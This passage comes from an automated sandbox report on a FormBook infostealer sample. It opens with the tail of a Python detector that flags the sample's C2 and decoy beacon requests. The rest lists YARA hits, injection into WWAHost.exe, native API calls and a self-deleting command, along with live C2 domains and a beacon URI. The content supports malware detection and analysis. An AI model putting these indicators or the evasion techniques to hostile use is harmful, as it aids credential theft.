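     "target": "/hht8/?V2=UdJvmcuMRIp/sNw0TNsoQAu26okuAPtZrfHvhR73KElz+11bxdQbtsNL5cLMDPcOzFi3&5j=SVeDzJKXh",
     "headers": {"Host": "www.sherwoodmastiff.com", "Connection": "close"}},
    {"method": "GET", "target": "/index.html",
     "headers": {"Host": "www.sherwoodmastiff.com", "User-Agent": "Mozilla/5.0"}},
    {"method": "POST", "target": "/hht8/",
     "headers": {"Host": "www.eastwestasia-thailand.com"}},
]

# Heuristic shape of the first query value, read off the captured request.
B64ISH = re.compile(r"^[A-Za-z0-9+/=]{40,}$")


def load_config(text: str = CONFIG_JSON) -> dict:
    return json.loads(text)


def norm_host(host: str) -> str:
    """Decoys are listed bare; the sample queried www.<decoy>, so fold www."""
    host = host.strip().lower()
    return host[4:] if host.startswith("www.") else host


def c2_entries(cfg: dict) -> list:
    """Split each 'C2 list' entry into (host, path)."""
    out = []
    for entry in cfg["C2 list"]:
        host, _, path = entry.partition("/")
        out.append((norm_host(host), "/" + path))
    return out


def build_watchlist(cfg: dict):
    """Hosts to watch (C2 plus decoys) and the URI paths the beacon uses."""
    c2 = set(c2_entries(cfg))
    hosts = {h for h, _ in c2} | {norm_host(d) for d in cfg["decoy"]}
    paths = {p for _, p in c2}
    return c2, hosts, paths


def classify_request(req: dict, cfg: dict) -> list:
    """Reasons a single HTTP request looks like this sample's beacon."""
    c2, hosts, paths = build_watchlist(cfg)
    host = norm_host(req["headers"].get("Host", ""))
    parts = urlsplit(req["target"])
    reasons = []
    if host in hosts and parts.path in paths:
        kind = "c2" if (host, parts.path) in c2 else "decoy"
        reasons.append(f"{kind}_uri:{host}{parts.path}")
        # Split the query by hand so '+' inside the blob is not decoded to ' '.
        params = [kv.split("=", 1) for kv in parts.query.split("&") if kv]
        if len(params) == 2 and len(params[0]) == 2 and B64ISH.match(params[0][1]):
            reasons.append("formbook_query_shape")
        # "HTTP GET or POST without a user agent" from the signature list.
        if not req["headers"].get("User-Agent"):
            reasons.append("no_user_agent")
    return reasons


if __name__ == "__main__":
    cfg = load_config()
    print("C2:", c2_entries(cfg))
    for req in SAMPLE_REQUESTS:
        print(req["headers"]["Host"], req["target"][:24], classify_request(req, cfg))
```

Blocking only www.eastwestasia-thailand.com would miss what the sandbox actually recorded, since the first contact went to a decoy; matching on the path across the whole list catches both, while the benign request to the same decoy domain stays clean.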

            E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File source: 6.2.EH5ro3Hyug.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.EH5ro3Hyug.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000007.00000000.730557103.0000000006BFF000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.691567196.0000000003BF1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.753692091.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.934957623.00000000037B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.934785962.0000000003080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.754960764.0000000001890000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000000.714656452.0000000006BFF000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.934221004.0000000002A80000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.754337166.0000000001860000.00000040.00020000.sdmp, type: MEMORY

            System Summary:

Malicious sample detected (through community Yara rule)
Source: 6.2.EH5ro3Hyug.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.2.EH5ro3Hyug.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.2.EH5ro3Hyug.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.2.EH5ro3Hyug.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000000.730557103.0000000006BFF000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000000.730557103.0000000006BFF000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.691567196.0000000003BF1000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.691567196.0000000003BF1000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.753692091.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.753692091.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.934957623.00000000037B0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.934957623.00000000037B0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.934785962.0000000003080000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.934785962.0000000003080000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.754960764.0000000001890000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.754960764.0000000001890000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000000.714656452.0000000006BFF000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000000.714656452.0000000006BFF000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.934221004.0000000002A80000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.934221004.0000000002A80000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.754337166.0000000001860000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.754337166.0000000001860000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
.NET source code contains very large strings
Source: EH5ro3Hyug.exe, Darwin.WindowsForm/SearchResults.cs | Long String: Length: 34816
Source: 0.2.EH5ro3Hyug.exe.810000.0.unpack, Darwin.WindowsForm/SearchResults.cs | Long String: Length: 34816
Source: 5.0.EH5ro3Hyug.exe.c0000.0.unpack, Darwin.WindowsForm/SearchResults.cs | Long String: Length: 34816
Source: 5.2.EH5ro3Hyug.exe.c0000.0.unpack, Darwin.WindowsForm/SearchResults.cs | Long String: Length: 34816
Source: 6.0.EH5ro3Hyug.exe.f20000.0.unpack, Darwin.WindowsForm/SearchResults.cs | Long String: Length: 34816
Source: 6.2.EH5ro3Hyug.exe.f20000.1.unpack, Darwin.WindowsForm/SearchResults.cs | Long String: Length: 34816
Source: EH5ro3Hyug.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: 6.2.EH5ro3Hyug.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.2.EH5ro3Hyug.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.EH5ro3Hyug.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.2.EH5ro3Hyug.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000000.730557103.0000000006BFF000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000000.730557103.0000000006BFF000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.691567196.0000000003BF1000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.691567196.0000000003BF1000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.753692091.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.753692091.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000002.934957623.00000000037B0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000002.934957623.00000000037B0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000002.934785962.0000000003080000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000002.934785962.0000000003080000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.754960764.0000000001890000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.754960764.0000000001890000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000000.714656452.0000000006BFF000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000000.714656452.0000000006BFF000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000002.934221004.0000000002A80000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000C.00000002.934221004.0000000002A80000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000006.00000002.754337166.0000000001860000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000006.00000002.754337166.0000000001860000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exe | Code function: 0_2_0504E5E0
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exe | Code function: 0_2_0504E5F0
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exe | Code function: 0_2_0504C194
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exe | Code function: 0_2_092F0006
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exe | Code function: 0_2_092F0040
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exe | Code function: 0_2_092F5B87
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exe | Code function: 0_2_092F5B98
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exe | Code function: 6_2_0040102E
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exe | Code function: 6_2_00401030
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exe | Code function: 6_2_0041DAD8
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exe | Code function: 6_2_0041ED7F
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exe | Code function: 6_2_00402D87
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exe | Code function: 6_2_00402D90
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exe | Code function: 6_2_00409E50
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exe | Code function: 6_2_0041D630
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exe | Code function: 6_2_00402FB0
            Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 12_2_03B9EBB0
            Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 12_2_03C31FF1
            Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 12_2_03C32B28
            Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 12_2_03C32EF7
            Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 12_2_03C322AE
            Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 12_2_03B86E30
            Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 12_2_03B92581
            Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 12_2_03B7D5E0
            Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 12_2_03B60D20
            Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 12_2_03C31D55
            Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 12_2_03B84120
            Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 12_2_03B6F900
            Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 12_2_03C32D07
            Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 12_2_03B920A0
            Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 12_2_03B7B090
            Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 12_2_03C320A8
            Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 12_2_03B7841F
            Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 12_2_03C21002
            Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 12_2_02A9D630
            Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 12_2_02A89E50
            Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 12_2_02A82FB0
            Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 12_2_02A82D87
            Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 12_2_02A82D90
            Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 12_2_02A9ED7F
            Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: String function: 03B6B150 appears 35 times
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exe | Code function: 6_2_0041A350 NtCreateFile,
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exe | Code function: 6_2_0041A400 NtReadFile,
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exe | Code function: 6_2_0041A480 NtClose,
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exe | Code function: 6_2_0041A530 NtAllocateVirtualMemory,
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exe | Code function: 6_2_0041A30A NtCreateFile,
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exe | Code function: 6_2_0041A3FD NtReadFile,
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exe | Code function: 6_2_0041A47A NtClose,
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exe | Code function: 6_2_0041A52B NtAllocateVirtualMemory,
            Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 12_2_03BA9780 NtMapViewOfSection,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 12_2_03BA9FE0 NtCreateMutant,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 12_2_03BA9710 NtQueryInformationToken,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 12_2_03BA96E0 NtFreeVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 12_2_03BA96D0 NtCreateKey,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 12_2_03BA9660 NtAllocateVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 12_2_03BA9650 NtQueryValueKey,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 12_2_03BA9A50 NtCreateFile,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 12_2_03BA99A0 NtCreateSection,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 12_2_03BA95D0 NtClose,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 12_2_03BA9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 12_2_03BA9540 NtReadFile,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 12_2_03BA9860 NtQuerySystemInformation,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 12_2_03BA9840 NtDelayExecution,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 12_2_03BAA3B0 NtGetContextThread,
            Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 12_2_03BA97A0 NtUnmapViewOfSection,
            Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 12_2_03BA9730 NtQueryVirtualMemory,
            Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 12_2_03BAA710 NtOpenProcessToken,
            Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 12_2_03BA9B00 NtSetValueKey,
            Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 12_2_03BA9770 NtSetInformationFile,
            Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 12_2_03BAA770 NtOpenThread,
            Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 12_2_03BA9760 NtOpenProcess,
            Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 12_2_03BA9A80 NtOpenDirectoryObject,
            Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 12_2_03BA9A20 NtResumeThread,
            Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 12_2_03BA9610 NtEnumerateValueKey,
            Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 12_2_03BA9A10 NtQuerySection,
            Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 12_2_03BA9A00 NtProtectVirtualMemory,
            Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 12_2_03BA9670 NtQueryInformationProcess,
            Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 12_2_03BA95F0 NtQueryInformationFile,
            Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 12_2_03BA99D0 NtCreateProcessEx,
            Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 12_2_03BAAD30 NtSetContextThread,
            Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 12_2_03BA9520 NtWaitForSingleObject,
            Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 12_2_03BA9560 NtWriteFile,
            Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 12_2_03BA9950 NtQueueApcThread,
            Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 12_2_03BA98A0 NtWriteVirtualMemory,
            Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 12_2_03BA98F0 NtReadVirtualMemory,
            Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 12_2_03BA9820 NtEnumerateKey,
            Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 12_2_03BAB040 NtSuspendThread,
            Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 12_2_02A9A350 NtCreateFile,
            Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 12_2_02A9A480 NtClose,
            Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 12_2_02A9A400 NtReadFile,
            Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 12_2_02A9A530 NtAllocateVirtualMemory,
            Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 12_2_02A9A3FD NtReadFile,
            Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 12_2_02A9A30A NtCreateFile,
            Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 12_2_02A9A47A NtClose,
            Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 12_2_02A9A52B NtAllocateVirtualMemory,
            Source: EH5ro3Hyug.exe, 00000000.00000002.689346150.0000000002D0F000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameColladaLoader.dll4 vs EH5ro3Hyug.exe
            Source: EH5ro3Hyug.exe, 00000000.00000000.664879459.00000000008DC000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameEventManifestOptio.exe4 vs EH5ro3Hyug.exe
            Source: EH5ro3Hyug.exe, 00000000.00000002.688667693.0000000001050000.00000004.00000020.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs EH5ro3Hyug.exe
            Source: EH5ro3Hyug.exe, 00000005.00000000.685620813.000000000018C000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameEventManifestOptio.exe4 vs EH5ro3Hyug.exe
            Source: EH5ro3Hyug.exe, 00000006.00000002.756041346.0000000001B7F000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs EH5ro3Hyug.exe
            Source: EH5ro3Hyug.exe, 00000006.00000000.686555541.0000000000FEC000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameEventManifestOptio.exe4 vs EH5ro3Hyug.exe
            Source: EH5ro3Hyug.exe, 00000006.00000002.757431344.00000000036E6000.00000040.00020000.sdmp | Binary or memory string: OriginalFilenameWWAHost.exej% vs EH5ro3Hyug.exe
            Source: EH5ro3Hyug.exe | Binary or memory string: OriginalFilenameEventManifestOptio.exe4 vs EH5ro3Hyug.exe
            Source: EH5ro3Hyug.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: EH5ro3Hyug.exe | Virustotal: Detection: 31%
            Source: EH5ro3Hyug.exe | ReversingLabs: Detection: 28%
            Source: EH5ro3Hyug.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: unknown | Process created: C:\Users\user\Desktop\EH5ro3Hyug.exe 'C:\Users\user\Desktop\EH5ro3Hyug.exe'
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exe | Process created: C:\Users\user\Desktop\EH5ro3Hyug.exe C:\Users\user\Desktop\EH5ro3Hyug.exe
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exe | Process created: C:\Users\user\Desktop\EH5ro3Hyug.exe C:\Users\user\Desktop\EH5ro3Hyug.exe
            Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\autoconv.exe C:\Windows\SysWOW64\autoconv.exe
            Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\WWAHost.exe C:\Windows\SysWOW64\WWAHost.exe
            Source: C:\Windows\SysWOW64\WWAHost.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\EH5ro3Hyug.exe'
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exe | Process created: C:\Users\user\Desktop\EH5ro3Hyug.exe C:\Users\user\Desktop\EH5ro3Hyug.exe
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exe | Process created: C:\Users\user\Desktop\EH5ro3Hyug.exe C:\Users\user\Desktop\EH5ro3Hyug.exe
            Source: C:\Windows\SysWOW64\WWAHost.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\EH5ro3Hyug.exe'
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\EH5ro3Hyug.exe.log
            Source: classification engine | Classification label: mal100.troj.evad.winEXE@10/1@2/1
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5548:120:WilError_01
            Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
